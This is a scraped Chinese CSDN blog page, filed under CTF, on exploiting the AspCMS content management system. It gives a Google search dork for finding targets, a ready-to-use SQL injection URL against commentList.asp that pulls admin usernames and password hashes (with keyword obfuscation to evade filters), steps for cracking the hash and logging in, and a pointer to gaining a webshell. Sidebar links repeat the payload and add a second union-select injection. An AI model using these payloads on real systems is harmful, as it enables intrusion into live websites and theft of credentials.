【WEB】aspcms漏洞利用

最新推荐文章于 2024-04-18 11:03:56 发布
最新推荐文章于 2024-04-18 11:03:56 发布
阅读量1.8w 收藏 11
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014549283/article/details/81810940
版权

【社工方法】(不推荐)

1.首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011 的漏洞,果然功夫不负有心人
2.接着利用注入漏洞
/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user


然后登陆https://www.somd5.com/来解md5

3.去登陆后台 ,登陆成功
然后搜了一下aspcms 的文件上传get webshell 
https://www.i0day.com/1595.html
我们来尝试一下
我们点击修改
 

最低0.47元/天 解锁文章
pcy190
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
复现 ASPCMS企业建站系统Cookies欺骗漏洞
记录并分享学习安全的知识点..
08-21 834
ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 ASPCMS2.0存在sql注入注入漏洞,可获得admin管理员用户的cookie值。
aspcms各版本漏洞0day集合
weixin_33889665的博客
11-03 2138
admin/_content/_About/AspCms_AboutEdit.asp?id=19and1=2unionselect1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24fromaspcms_userwhereuserid=1———————————...
0day漏洞(aspcms)漏洞实战
weixin_49071539的博客
12-16 3367
1. 谷歌搜索关键字 Powered by aspcms.com Copyright ?2010-2011 intitle:Powered by AspCms2 2. 接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 3.
1day-AspCMS commentList.asp接口处存在SQL注入漏洞
最新发布
weixin_43167326的博客
04-18 785
AspCms”是一个开源的内容管理系统(CMS),基于ASP.NET技术开发。它提供了创建和管理网站内容的功能,包括文章、图片、视频等。aspcms具有易用性和灵活性,适用于中小型网站的建设。AspCMS commentList.asp接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
WEB攻防-asp安全
worryanswer的博客
08-11 763
web攻防-ASP安全
aspcms cookies欺骗和后台无验证注入
qq_38807738的博客
06-23 3159
后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。而且纯在cookies欺骗!————————后台注射———————— http://www.webshell.cc/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname...
漏洞 立即留言_ASPCMS留言板漏洞注入一句话木马插入数据库及修复方法
weixin_39931923的博客
12-19 1243
aspcms主要是信息发布系统,影响版本为asp。漏洞成因,在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入数据库。数据库默认配置为asp.目录在/data/data.asp下。利用方法,保证默认数据库路径末更改及可留言,就算不能留言,可构造,经测试,基本上末更改aspcms主要是信息发布系统,影响版本为asp。漏洞成因,在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入...
最新ASPCMS 0DAY利用工具(附VB源码)
03-25
ASPCMS 0DAY利用工具是一款专门针对ASPCMS系统的漏洞利用工具,它包含了VB(Visual Basic)源码,能够帮助安全研究人员或者攻击者理解并利用ASPCMS系统中的未公开漏洞,即所谓的0day漏洞。0day漏洞是指软件开发者...
aspcms绿色清新企业模板
10-11
- 定期更新:保持aspcms系统的版本更新,修复可能的安全漏洞,提高网站安全性。 - 数据备份:定期备份数据库,以防数据丢失,确保网站稳定运行。 在提供的文件名"lvse"中,虽然没有具体文件内容的描述,但可以推测...
PlugNT CMS v3.6
04-26
PlugNT CMS,一款免费开源ASP.NET内容管理系统,PlugNT系统组成部分之一,系统采用ASP.NET(C#) + jQuery技术,是一个功能强大、操作人性化、搜索引擎优化、高效性、安全性、扩展性强的Web系统,产品主要优点有以下几...
基于ASP的简约CMS ASP网站管理系统.zip
07-14
总的来说,“基于ASP的简约CMS ASP网站管理系统”是一个利用ASP技术实现的轻量级网站管理工具,适合那些希望快速搭建和管理网站,且对技术栈有一定限制的用户。虽然面临一些挑战,但其易用性和成本效益仍然使其在...
睡死猪aspCMS蓝色(无功能限制上传即用) v2014 bulid0627
04-03
更新日志: *更新了数据库链接安全 *更新了数据库调用计算 *增加了前后台对应帮助,参阅根目录下图片。 睡死猪企业网站管理系统(睡死猪CMS)是睡死猪研发中心(sspig.com)专业为企业建站而开发的一款网站程序。该系统采用最简单易用的asp+access进行搭建,拥有完善的网站前后台,并特别根据企业网站的特点开发出独具特色的栏目和功能。 睡死猪CMS是企业建站的绝佳选择! 系统三大特色: 1、全静态:全站生成.html静态页面。降低服务器压力,增强百度收录。 2、高优化:特别针对搜索引擎进行优化处理,让客户快速找到你。 3、够简单:拥有完善后台管理系统,所有内容均可在后台进行更新。非专业人士也可操作。 后台管理地址:http://你的网站域名/Admin/login.asp 用户名:admin 密码:admin 后台文件夹名:Admin 数据库存放位置:Data21293 提醒:为确保网站安全,我们建议: 1、更改默认的后台用户名和密码; 2、更改默认的后台文件夹名Admin,直接修改根目录下的文件夹名称即可; 3、更改默认的数据库文件夹Data21293及数据库名称,请确保inc文件夹下的数据库连接文件conn.asp内也作相应修改。 1、本地测试请使用windows2003、完整的IIS6.0以上。 2、整站程序请上传至虚拟主机根目录下。 3、整站程序绝对无功能限制,完全开放免费使用。请不要再反复咨询这个问题了。
ASPCMS防攻击修改方法.rar
11-25
ASPCMS是很好的开源建站系统,有着小灵快的特点利于SEO,但是很容易被攻击,介绍一下默认路径修改防攻击方法,不用修补漏洞,直接修改程序路径即可。
aspcms开源的网站源码
04-09
aspcms,开源的网站源码 ★2.5.7 2015年1月20日 1.【重要】修复高危漏洞 2. 修复微信分享报错 3. 手机识别自动跳转 ★2.5.6 2015年1月10日 1.【重要】修复多处漏洞 2.修复搜索报错的问题 3.手机访问自动跳转 4.修复留言页链接错误的问题 5.完善支付宝接口 6.完善购物车
ASPCMS开源企业网站管理系统 UTF8 v2.7.3
10-16
ASPCMS是由上谷网络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。本版为直接使用版 , 下载后上传即可使用 , 详细请查看下载源码中文档说明。功能列表:1、支持一键生成html2、支持google和百度地图生成3、RSS生成4、URL自定义5、增加按指定日期生成内容6、自定义生成目录、文件名称7、分类自定义模板、内容自定义模板8、分类访问权限控制9、一键切换模板10、模板防盗功能11、在线修改模板,CSS文件12、采集功能13、招聘应聘功能14、TAG功能15、批量添加分类功能16、水印功能17、留言,评论内容过滤功能18、在线升级功能19、事件邮件提醒功能20、增加相册功能21、自定义标签功能22、广告位管理功能23、浮动广告,对联广告,右下弹出广告24、支持无限极分类;25、支持自定义标题、自定义关键词、自定义描述26、支持栏目,分类是否启用开关27、支持外部跳转链接控制28、拥有留言板、友情链接,上传文件管理,数据库备份/恢复,在线客服,幻灯片等常用功能29、特有冗余文件检测功能,可以检测无用的上
ASP网站CMS程序源码——机智CMS(witcms) 实例开发.rar
10-17
- witcms基于ASP,利用IIS(Internet Information Services)作为Web服务器,与数据库如Access或SQL Server进行交互,存储和检索内容。 - ASP代码通常包含HTML、VBScript或JScript,通过运行在服务器上的解释器...
ASP漏洞集-ASP漏洞分析和解决方法
Execute的专栏
01-30 2179
1 在ASP程序后加个特殊符号,能看到ASP源程序  受影响的版本:  win95+pws  IIS3.0  98+pws4 不存在这个漏洞。  IIS4.0以上的版本也不存在这个漏洞。  问题描述:  这些特殊符号包括小数点,%81, ::$DATA。比如:http://someurl/somepage.asp.http:// someurl/somepage.asp%81http:// som
CMS漏洞复现
qq_43613144的博客
07-20 6211
漏洞复现-啧啧啧
墨者学院_CMS系统漏洞分析溯源(第4题)
weixin_50698958的博客
10-10 746
靶场: https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe 背景介绍 ASPCMS是完全开源的一套CMS建站系统,主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网站,一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异的公司企业网站。ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 实训目标 1.学习登录绕过
onDeleteComment(event) { // 获取被点击的删除按钮的 data-id 值 var id = event.currentTarget.dataset.id; // 遍历评论列表,找到需要删除的评论对象 for(var i=0; i<commentList.length; i++) { if(commentList[i].id == id) { // 删除该评论对象 commentList.splice(i, 1); // 更新页面的评论列表和评论数量 this.setData({ commentList: commentList, commentCount: commentList.length }); break; } } }, 帮我优化缩减代码
06-09
Sure, 可以优化代码如下: ```javascript onDeleteComment(event) { const id = event.currentTarget.dataset.id; const index = commentList.findIndex(comment => comment.id === id); if (index > -1) { commentList.splice(index, 1); this.setData({ commentList, commentCount: commentList.length }); } } ``` 这里我使用了 findIndex 方法来查找需要删除的评论对象的索引,如果找到了则删除评论对象,然后通过 setData 更新页面的评论列表和评论数量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值